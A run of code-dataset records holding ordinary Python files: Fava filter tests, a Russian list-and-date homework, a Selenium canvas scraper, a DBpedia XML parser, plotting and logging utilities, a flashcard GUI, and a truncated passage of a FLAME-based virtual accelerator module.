app.preprocess_request()\n assert not g.ledger.fava_options[\"show-accounts-with-zero-balance\"]\n assert should_show(g.ledger.root_tree.get(\"\")) is True\n assert should_show(g.ledger.root_tree.get(\"Expenses\")) is False\n\n\ndef test_format_errormsg(app):\n with app.test_request_context(\"/long-example/\"):\n app.preprocess_request()\n assert (\n format_errormsg(\"Test for 'Expenses:Acme:Cash': Test\")\n == 'Test for Expenses:Acme:Cash: Test'\n )\n assert (\n format_errormsg(\"Test Expenses:Acme:Cash Test\")\n == 'Test Expenses:Acme:Cash Test'\n )\n assert format_errormsg(\"Test: Test\") == \"Test: Test\"\n\n\ndef test_collapse_account(app, monkeypatch):\n with app.test_request_context(\"/long-example/\"):\n app.preprocess_request()\n\n monkeypatch.setitem(\n g.ledger.fava_options,\n \"collapse-pattern\",\n [\n \"^Assets:Stock$\",\n \"^Assets:Property:.*\",\n ],\n )\n g.ledger.accounts[\"Assets:Stock\"] = AccountData()\n g.ledger.accounts[\"Assets:Property\"] = AccountData()\n\n assert collapse_account(\"Assets:Cash\") is False\n assert collapse_account(\"Assets:Cash\") is False\n\n assert collapse_account(\"Assets:Stock\") is True\n assert collapse_account(\"Assets:Stock\") is True\n assert collapse_account(\"Assets:Stock\") is True\n\n assert collapse_account(\"Assets:Property\") is False\n assert collapse_account(\"Assets:Property:Real\") is True\n assert collapse_account(\"Assets:Property:Real:Land\") is True\n","sub_path":"tests/test_template_filters.py","file_name":"test_template_filters.py","file_ext":"py","file_size_in_byte":3767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"161113735","text":"# Задача-1:\n# Дан список, заполненный произвольными целыми числами, получите новый список,\n# элементами которого будут квадратные корни элементов исходного списка,\n# но только если результаты извлечения корня не имеют десятичной части и\n# если такой корень вообще можно извлечь\n# Пример: Дано: [2, -5, 8, 9, -25, 25, 4] Результат: [3, 5, 2]\nimport random\nimport math\n\nprint (\"Задача 1\")\n\n# Программа сама генерирует список из положительных и отрицательных случайных целых чисел.\n# Количество элементов в списке устанавливается случайным образом от 1 до 20.\n# После этого производится решение задачи по заданному условию.\n\nprint (\"Создание произвольного списка из целых чисел:\")\n\ngenerated_list = [2, -5, 8, 9, -25, 25, 4]\n\nprint (\"Поиск целочисленных квадратных корней элементов списка:\", generated_list)\n\nnew_list = []\n\nfor element in generated_list:\n if element >= 0:\n result = math.sqrt(element)\n if result.is_integer():\n new_list.append(int(result))\n\nif len(new_list) > 0:\n print (new_list)\nelse:\n print (\"Корней, удовлетворяющих условию задачи не найдено!\")\n\n# Задача-2: Дана дата в формате dd.mm.yyyy, например: 02.11.2013.\n# Ваша задача вывести дату в текстовом виде, например: второе ноября 2013 года.\n# Склонением пренебречь (2000 года, 2010 года)\n\nimport datetime\n\nprint (\"Задача 2\")\n\ndate_str = \"02.11.2013\"\nprint (\"Исходное значение:\", date_str)\n\ndate_split = date_str.split(\".\")\n\nday, month, year = date_split[0], date_split[1], date_split[2]\n\ndays = [\n \"первое\",\n \"второе\",\n \"третье\",\n \"четвертое\",\n \"пятое\",\n \"шестое\",\n \"седьмое\",\n \"восьмое\",\n \"девятое\"\n]\n\ndays_1x = [\n \"одиннадцатое\",\n \"двенадцатое\",\n \"тринадцатое\",\n \"четырнадцатое\",\n \"пятнадцатое\",\n \"шестнадцатое\",\n \"семнадцатое\",\n \"восемнадцатое\",\n \"девятнадцатое\"\n]\n\nresult = []\n\nday = int(day)\n\nif day == 10:\n result.append(\"десятое\")\nelif day == 20:\n result.append(\"двадцатое\")\nelif day == 30:\n result.append(\"тридцатое\")\nelif day == 31:\n result.append(\"тридцать \" + days[0])\nelif day < 10:\n result.append(days[day-1])\nelif 10 < day < 20:\n result.append(days_1x[day-11])\nelif 20 < day < 30:\n result.append(\"Двадцать \" + days[day-21])\n\nmonths = [\n \"января\",\n \"февраля\",\n \"марта\",\n \"апреля\",\n \"мая\",\n \"июня\",\n \"июля\",\n \"августа\",\n \"сентября\",\n \"октября\",\n \"ноября\",\n \"декабря\"\n]\n\nmonth = int(month)\nresult.append((months[month-1]))\n\nresult.append(year)\nresult.append(\"года\")\n\nfor words in result:\n print(words, end=' ')\n\nprint()\n\n# Задача-3: Напишите алгоритм, заполняющий список произвольными целыми числами\n# в диапазоне от -100 до 100. В списке должно быть n - элементов.\n# Подсказка:\n# для получения случайного числа используйте функцию randint() модуля random\n\nprint(\"Задача 3\")\nprint (\"Создание списка из произвольных целых чисел в диапазоне от -100 до 100:\")\n\ngenerated_list = []\n\nn = 10\n\nwhile len(generated_list) < n:\n generated_list.append(random.randint(-100, 100))\n\nprint (\"{lst} содержит {size} элемент(ов)\".format(lst=generated_list, size=n))\n\n# Задача-4: Дан список, заполненный произвольными целыми числами.\n# Получите новый список, элементами которого будут: \n# а) неповторяющиеся элементы исходного списка:\n# например, lst = [1, 2, 4, 5, 6, 2, 5, 2], нужно получить lst2 = [1, 2, 4, 5, 6]\n# б) элементы исходного списка, которые не имеют повторений:\n# например, lst = [1 , 2, 4, 5, 6, 2, 5, 2], нужно получить lst2 = [1, 4, 6]\n\nprint(\"Задача 4\")\n\nlst = [1, 2, 4, 5, 6, 2, 5, 2]\nprint(\"Исходный список:\", lst)\nlst2 = list(set(lst))\nprint(\"Уникальные элементы:\", lst2)\n\n# Позвольте выразить свои опасения по поводу формулировки 4-а.\n# Элемент со значением 2, который присутствует в ответе - это\n# повторяющийся элемент в исходном списке. Глядя на решение,\n# я понимаю, что речь идет о применении set.\n\nlst2.clear()\n\nunique = set()\nduplicates = set()\n\nfor i in lst:\n if i not in unique:\n unique.add(i)\n else:\n duplicates.add(i)\n\nprint(\"Неповторяющиеся элементы:\", unique - duplicates)","sub_path":"lesson02/home_work/hw02_normal.py","file_name":"hw02_normal.py","file_ext":"py","file_size_in_byte":5736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"159821797","text":"from selenium import webdriver\nimport base64\n\nbrowser = webdriver.Chrome(\"C:/Users/Christian/Documents/MLML/nlp_animation_generator/SpriteData/chromedriver.exe\") #replace with .Firefox(), or with the browser of your choice\nurl = \"http://gaurav.munjal.us/Universal-LPC-Spritesheet-Character-Generator/#?sex=female&legs=sara&mail=chain\"\nbrowser.get(url)\ncanvas = browser.find_element_by_css_selector(\"#spritesheet\")\n# get the canvas as a PNG base64 string\ncanvas_base64 = browser.execute_script(\"return arguments[0].toDataURL('image/png').substring(21);\", canvas)\n\n# decode\ncanvas_png = base64.b64decode(canvas_base64)\n\n# save to a file\nwith open(r\"canvas.png\", 'wb') as f:\n f.write(canvas_png)","sub_path":"SpriteData/examples/selenium_scraper.py","file_name":"selenium_scraper.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"129320274","text":"# Code édité par Victor Besse et Jean-Sébastien Sainte-Rose\r\n# après la dernière séance du mercredi 4 juillet 2017\r\n# avec la présence, l'aide et le soutien de toute l'équipe\r\nimport xml.etree.ElementTree as ET\r\nimport re\r\n\r\n#Déclaration des NameSpaces pour la recherche\r\nns = {\"owl\":\"http://www.w3.org/2002/07/owl#\",\"rdf\":\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\",\"rdfs\":\"http://www.w3.org/2000/01/rdf-schema#\"}\r\n\r\ntree = ET.parse('dbpedia_2016-04.xml')\r\n\r\n#récupère la racine du fichier\r\nroot = tree.getroot()\r\n\r\n#get : accède à l'attribut de l'élément\r\n#find : accède à l'élément\r\n#Parcourt l'arbre pour retrouver les éléments qui nous intéressent\r\nsubClassOf_bool = False\r\nelems = tree.findall(\".//owl:Class\",ns)\r\nsousClasse = tree.findall(\".//rdfs:subClassOf\",ns)\r\nfileJson=open('./ClassesDbpedia.json','w')\r\nfor e in elems:\r\n nom = e.get('about')\r\n nom = re.sub(\"/ontology/\",\"\", nom)\r\n Subclasses = e.findall(\".//rdfs:subClassOf\",ns)\r\n fileJson.write('{\"name\" : \"'+str(nom)+'\"')\r\n fileJson.write('')\r\n for Sc in Subclasses:\r\n if Sc!=None:\r\n stringSC=str(Sc.get('resource'))\r\n stringSC=re.sub(\"/ontology/\",\"\",stringSC)\r\n stringSC=re.sub(\"http://www.w3.org/2002/07/owl#\",\"\",stringSC)\r\n stringSC=re.sub(\"http://schema.org/\",\"\",stringSC)\r\n stringSC=re.sub(\"http://www.ontologydesignpatterns.org/ont/dul/DUL.owl#\",\"\",stringSC)\r\n if subClassOf_bool == False:\r\n subClassOf_bool = True\r\n fileJson.write(' , \"subClassOf\": [\"'+stringSC+'\"')\r\n else:\r\n fileJson.write(','+'\"'+stringSC+'\"')\r\n \r\n fileJson.write(']}\\n')\r\n print(subClassOf_bool)\r\n subClassOf_bool = False\r\n\r\n\r\n","sub_path":"parser/parseurDBPedia.py","file_name":"parseurDBPedia.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"280592082","text":"import matplotlib.pyplot as plt # standard abbreviation\n\n\nx = [2, 4, 6, 8, 10]\ny = [6, 7, 8, 2, 4]\n\nx2 = [1, 3, 5, 7, 9]\ny2 = [7, 8, 2, 4, 2]\n\n# plots bar graph with label (for legend) and colors (can use name, letter or hex colors)\nplt.bar(x, y, label='Bars1', color='r')\nplt.bar(x2, y2, label='Bars2', color='c')\n\npopulation_ages = [22, 55, 62, 25, 21, 2, 34, 42, 42, 4, 4, 99, 102, 110, 120, 121, 122, 130, 111, 115, 112, 80, 75, 65, 54, 44, 43, 42, 48]\n\nbins = [0, 20, 40, 60, 80, 100, 120]\n#plt.hist(population_ages, bins, histtype='bar', rwidth=0.8)\n#plt.show()\n\n\n# add x and y labels\nplt.xlabel('x')\nplt.ylabel('y')\n\n# adds title\nplt.title('Interesting Graph\\nCheck it out')\n\n# adds legend\nplt.legend()\n\n# Show plot\n#plt.show()\n\n\n\n\n","sub_path":"Matplotlib/BarChartAndHistogram.py","file_name":"BarChartAndHistogram.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"447518322","text":"import shutil\nimport os\nimport time\nimport re\nimport sys\nimport numpy as np\n\n\nclass ExprCreaterAndResumer:\n def __init__(self, rootdir, postfix=None):\n if not os.path.exists(rootdir):\n os.makedirs(rootdir)\n expr_dirs = os.listdir(rootdir)\n re_matches = [re.match(\"(\\d+)_\", x) for x in expr_dirs]\n expr_num = [int(x.group(1)) for x in re_matches if x is not None]\n highest_idx = np.argmax(expr_num) if len(expr_num) > 0 else -1\n\n # dir name is like \"5_Mar-09-12-27-59\" or \"5_\"\n self.dir = rootdir + '/' + '%02d' % (expr_num[highest_idx] + 1 if highest_idx != -1 else 0) + \\\n '_' + (postfix if postfix else time.strftime(\"%b-%d-%H-%M-%S\"))\n os.makedirs(self.dir)\n self.logfile = open(self.dir + \"/log.txt\", 'a') # no buffer\n self.redirect_output_to_logfile_as_well()\n\n def getLogDir(self):\n return self.dir\n\n def redirect_output_to_logfile_as_well(self):\n class Logger(object):\n def __init__(self, logfile):\n self.stdout = sys.stdout\n self.logfile = logfile\n\n def write(self, message):\n self.stdout.write(message)\n self.logfile.write(message)\n\n def flush(self):\n # this flush method is needed for python 3 compatibility.\n # this handles the flush command by doing nothing.\n # you might want to specify some extra behavior here.\n pass\n\n sys.stdout = Logger(self.logfile)\n sys.stderr = sys.stdout\n # Now you can use: `print \"Hello\"`, which will write \"Hello\" to both stdout and logfile\n\n def dump_src_code_and_model_def(self, fname):\n fname = os.path.abspath(fname) # if already absolute path, it does nothing\n shutil.copyfile(fname, self.dir + '/' + os.path.basename(fname))\n\n # copy all py files in current directory\n task_dir = fname.split('/')[-2] # this will give \"gaze\" \"modeling\" etc\n task_snapshot_dir = self.dir + '/all_py_files_snapshot/' + task_dir\n os.makedirs(task_snapshot_dir)\n task_py_files = [os.path.dirname(fname) + '/' + x for x in os.listdir(os.path.dirname(fname)) if\n x.endswith('.py')]\n for py in task_py_files:\n shutil.copyfile(py, task_snapshot_dir + '/' + os.path.basename(py))\n if '__init__.py' in py:\n shutil.copyfile(py, self.dir + '/all_py_files_snapshot/' + os.path.basename(py))\n\n","sub_path":"Week12/Experiment/experiment_saver/experiment_creater_and_resumer.py","file_name":"experiment_creater_and_resumer.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"19014573","text":"import sys\n\n# Check if argument was provided\n# Ensure definition of num_stairs\ndigit_string = sys.argv[1]\n\nif digit_string.isdigit():\n num_stairs = int(digit_string)\nelse:\n print(\"Natural number is expected!\")\n exit(1)\n\nfor i in range(num_stairs):\n print(\" \" * (num_stairs - (i + 1)) + \"#\" * (i + 1))\n","sub_path":"Week1/stairs.py","file_name":"stairs.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"28736830","text":"# (C) Datadog, Inc. 2020-present\n# All rights reserved\n# Licensed under a 3-clause BSD style license (see LICENSE)\nimport pytest\n\nfrom datadog_checks.couch import CouchDb\n\nfrom . import common\n\n\n@pytest.mark.usefixtures(\"dd_environment\")\ndef test_collect_metadata_instance(aggregator, datadog_agent, instance):\n check = CouchDb(common.CHECK_NAME, {}, [instance])\n check.check_id = common.CHECK_ID\n check.check(instance)\n version = common.COUCH_RAW_VERSION\n\n major, minor, patch = version.split('.')\n version_metadata = {\n 'version.raw': version,\n 'version.scheme': 'semver',\n 'version.major': major,\n 'version.minor': minor,\n 'version.patch': patch,\n }\n\n datadog_agent.assert_metadata(common.CHECK_ID, version_metadata)\n datadog_agent.assert_metadata_count(5)\n","sub_path":"couch/tests/test_couch.py","file_name":"test_couch.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"259453623","text":"import PySimpleGUI as gui\nimport os\nfrom models.CardSet import CardSet\nfrom models.Card import Card\nfrom util.saveFile import saveFile\nfrom util.findCardByMainColumn import findCardByMainColumn\nimport layout.Layout as Layout\nfrom windows import cardSetSettingsWindow, studyWindow\nfrom util.log.log import LogLevel, consoleLog\n\n\ndef init(cardSet: CardSet) -> None:\n\n currentCard: Card = Card()\n columns = cardSet.columns\n\n window = Layout.getMainWindow(cardSet)\n window.ElementJustification = 'center'\n\n while True:\n event, values = window.read()\n consoleLog(LogLevel.INFO, 'Event occured: ', f'{event}')\n\n if event == gui.WIN_CLOSED:\n break\n\n elif event == 'Open...':\n importPath = gui.popup_get_file(\n 'Open file', no_window=True, file_types=Layout.fileTypes)\n if importPath:\n cardSet = CardSet(filePath=importPath)\n # gets the main column from every card to display in listbox\n window['CARDLIST'].update(values=cardSet.cards)\n window.set_title(\n f'FloraStudy - {os.path.basename(importPath)}')\n\n elif event == 'CARDLIST':\n if values['CARDLIST']:\n currentCard = values['CARDLIST'][0]\n\n columns = cardSet.columns\n\n for i, column in enumerate(columns):\n window[column.upper()].update(\n currentCard.values[columns[i]])\n\n window['SAVEBUTTON'].update(disabled=False)\n\n elif event == 'Save as...':\n savePath = Layout.getSaveAsWindow()\n if savePath:\n saveFile(cardSet, savePath)\n\n elif event == 'Save':\n saveFile(cardSet, cardSet.originPath)\n\n elif event == 'SAVEBUTTON':\n newValues = {column: window[column.upper()].get()\n for column in columns}\n\n if currentCard in cardSet.cards:\n cardIndex = cardSet.cards.index(currentCard)\n\n cardSet.updateCard(newValues, cardIndex)\n window['CARDLIST'].update(values=cardSet.cards)\n\n saveFile(cardSet, cardSet.originPath)\n consoleLog(LogLevel.SUCCESS,\n 'Saved card to file ', f'{currentCard}')\n\n elif event == 'STUDYBUTTON':\n studyWindow.init(cardSet)\n\n elif event == 'CARDSETSETTINGSBUTTON':\n cardSet = cardSetSettingsWindow.init(cardSet)\n","sub_path":"windows/mainWindow.py","file_name":"mainWindow.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"189148945","text":"# encoding: UTF-8\n\n\"\"\"Library for running an EPICS-based virtual accelertor using FLAME evelope tracker.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\nimport math\nimport os.path\nimport random\nimport re\nimport shutil\nimport subprocess\nimport tempfile\nimport time\nfrom collections import OrderedDict\nfrom copy import deepcopy\n\ntry:\n from StringIO import StringIO\nexcept ImportError:\n from io import StringIO\n\nimport cothread\nfrom flame import Machine\n\nfrom phantasy.library.pv import Popen\nfrom phantasy.library.pv import catools\nfrom phantasy.library.parser import Configuration\nfrom phantasy.library.layout import SeqElement\nfrom phantasy.library.layout import CavityElement\nfrom phantasy.library.layout import SolCorElement\nfrom phantasy.library.layout import CorElement\nfrom phantasy.library.layout import QuadElement\nfrom phantasy.library.layout import BendElement\nfrom phantasy.library.layout import SextElement\nfrom phantasy.library.layout import StripElement\nfrom phantasy.library.layout import BPMElement\nfrom phantasy.library.layout import PMElement\nfrom phantasy.library.layout import BLElement\nfrom phantasy.library.layout import BCMElement\nfrom phantasy.library.layout import BLMElement\nfrom phantasy.library.layout import ValveElement\nfrom phantasy.library.layout import PortElement\nfrom phantasy.library.layout import DriftElement\nfrom phantasy.library.layout import EQuadElement\nfrom phantasy.library.layout import EBendElement\nfrom phantasy.library.layout import EMSElement\nfrom phantasy.library.layout import SolElement\nfrom phantasy.library.layout import VDElement\nfrom phantasy.library.layout import FCElement\nfrom phantasy.library.layout import ElectrodeElement\nfrom phantasy.library.layout import SlitElement\nfrom phantasy.library.layout import ChopperElement\nfrom phantasy.library.layout import AttenuatorElement\nfrom phantasy.library.layout import DumpElement\nfrom phantasy.library.layout import ApertureElement\nfrom phantasy.library.lattice import FlameLatticeFactory\n\n\ntry:\n basestring # Python 2.X\nexcept NameError:\n basestring = str # Python 3.X\n\n\n# configuration options\n\nCONFIG_MACHINE = \"machine\"\nCONFIG_FLAME_DATA_DIR = \"flame_data_dir\"\n\n# drift mask: bool\nCONFIG_DRIFT_MASK = \"drift_mask\"\n\n# default values\n\n_TEMP_DIRECTORY_SUFFIX = \"_va_flame\"\n\n# _DEFAULT_ERROR_VALUE = 0.0\n\n_VA_STATUS_GOOD = \"OK\"\n_VA_STATUS_BAD = \"ERR\"\n\n# global logger instance\n\n_LOGGER = logging.getLogger(__name__)\n\n# global virtual accelerator\n\n_VIRTUAL_ACCELERATOR = None\n\n\ndef start(layout, **kwargs):\n \"\"\"Start the global virtual accelerator.\n\n Parameters\n ----------\n layout :\n Accelerator layout object.\n\n Keyword Arguments\n -----------------\n settings :\n Dictionary of machine settings.\n channels :\n List of channel tuples with (name, properties, tags).\n start :\n Name of accelerator element to start simulation.\n end :\n Name of accelerator element to end simulation.\n data_dir :\n Path of directory containing FLAME data files.\n work_dir :\n Path of directory for execution of FLAME.\n \"\"\"\n\n global _VIRTUAL_ACCELERATOR\n if _VIRTUAL_ACCELERATOR is None:\n _VIRTUAL_ACCELERATOR = build_virtaccel(layout, **kwargs)\n\n if _VIRTUAL_ACCELERATOR.is_started():\n raise RuntimeError(\"Virtual Accelerator already started\")\n\n _VIRTUAL_ACCELERATOR.start()\n\n\ndef stop():\n \"\"\"Stop the global virtual accelerator.\n \"\"\"\n global _VIRTUAL_ACCELERATOR\n if _VIRTUAL_ACCELERATOR is None or not _VIRTUAL_ACCELERATOR.is_started():\n raise RuntimeError(\"Virtual Accelerator not started\")\n\n _VIRTUAL_ACCELERATOR.stop()\n\n\ndef build_virtaccel(layout, **kwargs):\n \"\"\"Convenience method to build a virtual accelerator.\n\n Parameters\n ----------\n layout :\n Accelerator layout object.\n\n Keyword Arguments\n -----------------\n settings :\n Dictionary of machine settings.\n channels :\n List of channel tuples with (name, properties, tags).\n start :\n Name of accelerator element to start simulation.\n end :\n Name of accelerator element to end simulation.\n data_dir :\n Path of directory containing FLAME data files.\n work_dir :\n Path of directory for execution of FLAME.\n\n Returns\n -------\n ret :\n VirtualAccelerator instance.\n \"\"\"\n va_factory = VirtualAcceleratorFactory(layout, **kwargs)\n\n return va_factory.build()\n\n\nclass VirtualAcceleratorFactory(object):\n \"\"\"Prepare a VirtualAccelerator for execution.\n\n The main purpose of this class is to process the accelerator\n description and configure the VirtualAccelerator for proper\n exection.\n \"\"\"\n def __init__(self, layout, **kwargs):\n self.layout = layout\n self.config = kwargs.get(\"config\", None)\n self.settings = kwargs.get(\"settings\", None)\n self.channels = kwargs.get(\"channels\", None)\n self.start = kwargs.get(\"start\", None)\n self.end = kwargs.get(\"end\", None)\n self.data_dir = kwargs.get(\"data_dir\", None)\n self.work_dir = kwargs.get(\"work_dir\", None)\n\n @property\n def layout(self):\n return self._layout\n\n @layout.setter\n def layout(self, layout):\n if not isinstance(layout, SeqElement):\n raise TypeError(\"VirtAccelFactory: 'layout' property much be type SeqElement\")\n self._layout = layout\n\n @property\n def start(self):\n return self._start\n\n @start.setter\n def start(self, start):\n if (start is not None) and not isinstance(start, basestring):\n raise TypeError(\"VirtAccelFactory: 'start' property much be type string or None\")\n self._start = start\n\n @property\n def end(self):\n return self._end\n\n @end.setter\n def end(self, end):\n if (end is not None) and not isinstance(end, basestring):\n raise TypeError(\"VirtAccelFactory: 'end' property much be type string or None\")\n self._end = end\n\n @property\n def config(self):\n return self._config\n\n @config.setter\n def config(self, config):\n if not isinstance(config, Configuration):\n raise TypeError(\"VirtAccelFactory: 'config' property must be type Configuration\")\n self._config = config\n\n @property\n def settings(self):\n return self._settings\n\n @settings.setter\n def settings(self, settings):\n if not isinstance(settings, dict):\n raise TypeError(\"VirtAccelFactory: 'settings' property much be type dict\")\n self._settings = settings\n\n @property\n def channels(self):\n return self._channels\n\n @channels.setter\n def channels(self, channels):\n if not isinstance(channels, list):\n raise TypeError(\"VirtAccelFactory: 'channels' property much be type list\")\n self._channels = channels\n\n @property\n def machine(self):\n return self._machine\n\n @machine.setter\n def machine(self, machine):\n if (machine is not None) and not isinstance(machine, basestring):\n raise TypeError(\"VirtAccelFactory: 'machine' property much be type string or None\")\n self._machine = machine\n\n @property\n def data_dir(self):\n return self._data_dir\n\n @data_dir.setter\n def data_dir(self, data_dir):\n if (data_dir is not None) and not isinstance(data_dir, basestring):\n raise TypeError(\"VirtAccelFactory: 'data_dir' property much be type string or None\")\n self._data_dir = data_dir\n\n @property\n def work_dir(self):\n return self._work_dir\n\n @work_dir.setter\n def work_dir(self, work_dir):\n if (work_dir is not None) and not isinstance(work_dir, basestring):\n raise TypeError(\"VirtAccelFactory: 'work_dir' property much be type string or None\")\n self._work_dir = work_dir\n\n def _findChannel(self, name, field, handle):\n for channel, props, _ in self.channels:\n if props[\"elemName\"] != name:\n continue\n if props[\"elemField_eng\"] != field:\n continue\n if props[\"elemHandle\"] != handle:\n continue\n # IMPORTANT: Channel names originating from channel finder\n # may be of type 'unicode' instead of 'str'. The cothread\n # library does not have proper support for unicode strings.\n return str(channel)\n\n raise RuntimeError(\"VirtAccelFactory: channel not found: '{}', '{}', '{}'\".format(name, field, handle))\n\n def _get_config(self, section, option, defvalue):\n if self.config.has_option(section, option):\n value = self.config.get(section, option)\n _LOGGER.debug(\"VirtAccelFactory: [{}] '{}' found in configuration: {}\".format(section, option, value))\n return value\n return defvalue\n\n def build(self):\n \"\"\"Process the accelerator description and configure the Virtual Accelerator.\n \"\"\"\n settings = self.settings\n\n data_dir = self.data_dir\n if (data_dir is None) and self.config.has_default(CONFIG_FLAME_DATA_DIR):\n data_dir = self.config.getabspath_default(CONFIG_FLAME_DATA_DIR)\n\n if data_dir is None:\n raise RuntimeError(\"VirtAccelFactory: No data directory provided, check the configuration\")\n\n work_dir = self.work_dir\n\n latfactory = FlameLatticeFactory(self.layout, config=self.config, settings=self.settings)\n latfactory.start = self.start\n latfactory.end = self.end\n\n m = re.match(\"(.*:)?(.*):(.*):(.*)\", self.channels[0][0])\n if not m:\n raise RuntimeError(\"VirtAccelFactory: Error determining channel prefix, check channel names\")\n\n if m.group(1) is None:\n chanprefix = None\n else:\n # IMPORTANT: chanprefix must\n # be converted from unicode\n chanprefix = str(m.group(1))\n\n va = VirtualAccelerator(latfactory, settings, chanprefix, data_dir, work_dir)\n\n for elem in self.layout.iter(start=self.start, end=self.end):\n # check drift mask first\n if self._get_config(elem.dtype, CONFIG_DRIFT_MASK, 'False').lower() == 'true':\n elem = DriftElement(elem.z, elem.length, elem.aperture, elem.name)\n #\n\n if isinstance(elem, CavityElement):\n # Need to normalize cavity phase settings to 0~360\n settings[elem.name][elem.fields.phase_phy] = _normalize_phase(settings[elem.name][elem.fields.phase_phy])\n va.append_rw(self._findChannel(elem.name, elem.fields.phase, \"setpoint\"),\n self._findChannel(elem.name, elem.fields.phase, \"readset\"),\n self._findChannel(elem.name, elem.fields.phase, \"readback\"),\n (elem.name, elem.fields.phase_phy), desc=\"Cavity Phase\", egu=\"degree\", drvh=360, drvl=0)\n va.append_rw(self._findChannel(elem.name, elem.fields.amplitude, \"setpoint\"),\n self._findChannel(elem.name, elem.fields.amplitude, \"readset\"),\n self._findChannel(elem.name, elem.fields.amplitude, \"readback\"),\n (elem.name, elem.fields.amplitude_phy), desc=\"Cavity Amplitude\", egu=\"%\")\n va.append_elem(elem)\n\n elif isinstance(elem, SolCorElement):\n va.append_rw(self._findChannel(elem.name, elem.fields.field, \"setpoint\"),\n self._findChannel(elem.name, elem.fields.field, \"readset\"),\n self._findChannel(elem.name, elem.fields.field, \"readback\"),\n (elem.name, elem.fields.field_phy), desc=\"Solenoid Field\", egu=\"T\") #, drvratio=0.10)\n va.append_rw(self._findChannel(elem.h.name, elem.h.fields.angle, \"setpoint\"),\n self._findChannel(elem.h.name, elem.h.fields.angle, \"readset\"),\n self._findChannel(elem.h.name, elem.h.fields.angle, \"readback\"),\n (elem.h.name, elem.h.fields.angle_phy), desc=\"Horizontal Corrector\", egu=\"radian\") #, drvabs=0.001)\n va.append_rw(self._findChannel(elem.v.name, elem.v.fields.angle, \"setpoint\"),\n self._findChannel(elem.v.name, elem.v.fields.angle, \"readset\"),\n self._findChannel(elem.v.name, elem.v.fields.angle, \"readback\"),\n (elem.v.name, elem.v.fields.angle_phy), desc=\"Vertical Corrector\", egu=\"radian\") #, drvabs=0.001)\n va.append_elem(elem)\n\n elif isinstance(elem, SolElement):\n va.append_rw(self._findChannel(elem.name, elem.fields.field, \"setpoint\"),\n self._findChannel(elem.name, elem.fields.field, \"readset\"),\n self._findChannel(elem.name, elem.fields.field, \"readback\"),\n (elem.name, elem.fields.field_phy), desc=\"Solenoid Field\", egu=\"T\") #, drvratio=0.10)\n va.append_elem(elem)\n\n elif isinstance(elem, CorElement):\n va.append_rw(self._findChannel(elem.h.name, elem.h.fields.angle, \"setpoint\"),\n self._findChannel(elem.h.name, elem.h.fields.angle, \"readset\"),\n self._findChannel(elem.h.name, elem.h.fields.angle, \"readback\"),\n (elem.h.name, elem.h.fields.angle_phy), desc=\"Horizontal Corrector\", egu=\"radian\") #, drvabs=0.001)\n va.append_rw(self._findChannel(elem.v.name, elem.v.fields.angle, \"setpoint\"),\n self._findChannel(elem.v.name, elem.v.fields.angle, \"readset\"),\n self._findChannel(elem.v.name, elem.v.fields.angle, \"readback\"),\n (elem.v.name, elem.v.fields.angle_phy), desc=\"Vertical Corrector\", egu=\"radian\") #, drvabs=0.001)\n va.append_elem(elem)\n\n elif isinstance(elem, BendElement):\n va.append_rw(self._findChannel(elem.name, elem.fields.field, \"setpoint\"),\n self._findChannel(elem.name, elem.fields.field, \"readset\"),\n self._findChannel(elem.name, elem.fields.field, \"readback\"),\n (elem.name, elem.fields.field_phy), desc=\"Bend Relative Field\", egu=\"none\") #, drvratio=0.10)\n va.append_elem(elem)\n\n elif isinstance(elem, EBendElement):\n va.append_rw(self._findChannel(elem.name, elem.fields.field, \"setpoint\"),\n self._findChannel(elem.name, elem.fields.field, \"readset\"),\n self._findChannel(elem.name, elem.fields.field, \"readback\"),\n (elem.name, elem.fields.field_phy), desc=\"EBend Field\", egu=\"V\") #, drvratio=0.10)\n va.append_elem(elem)\n\n elif isinstance(elem, QuadElement):\n va.append_rw(self._findChannel(elem.name, elem.fields.gradient, \"setpoint\"),\n self._findChannel(elem.name, elem.fields.gradient, \"readset\"),\n self._findChannel(elem.name, elem.fields.gradient, \"readback\"),\n (elem.name, elem.fields.gradient_phy), desc=\"Quadrupole Gradient\", egu=\"T/m\") #, drvratio=0.10)\n va.append_elem(elem)\n\n elif isinstance(elem, EQuadElement):\n va.append_rw(self._findChannel(elem.name, elem.fields.gradient, \"setpoint\"),\n self._findChannel(elem.name, elem.fields.gradient, \"readset\"),\n self._findChannel(elem.name, elem.fields.gradient, \"readback\"),\n (elem.name, elem.fields.gradient_phy), desc=\"EQuad Field\", egu=\"V\")\n va.append_elem(elem)\n\n elif isinstance(elem, SextElement):\n va.append_rw(self._findChannel(elem.name, elem.fields.field, \"setpoint\"),\n self._findChannel(elem.name, elem.fields.field, \"readset\"),\n self._findChannel(elem.name, elem.fields.field, \"readback\"),\n (elem.name, elem.fields.field_phy), desc=\"Sextupole Gradient\", egu=\"T/m^2\")\n va.append_elem(elem)\n\n elif isinstance(elem, BPMElement):\n va.append_ro(self._findChannel(elem.name, elem.fields.x, \"readback\"),\n (elem.name, elem.fields.x_phy), desc=\"Horizontal Position\", egu=\"m\")\n va.append_ro(self._findChannel(elem.name, elem.fields.y, \"readback\"),\n (elem.name, elem.fields.y_phy), desc=\"Vertical Position\", egu=\"m\")\n 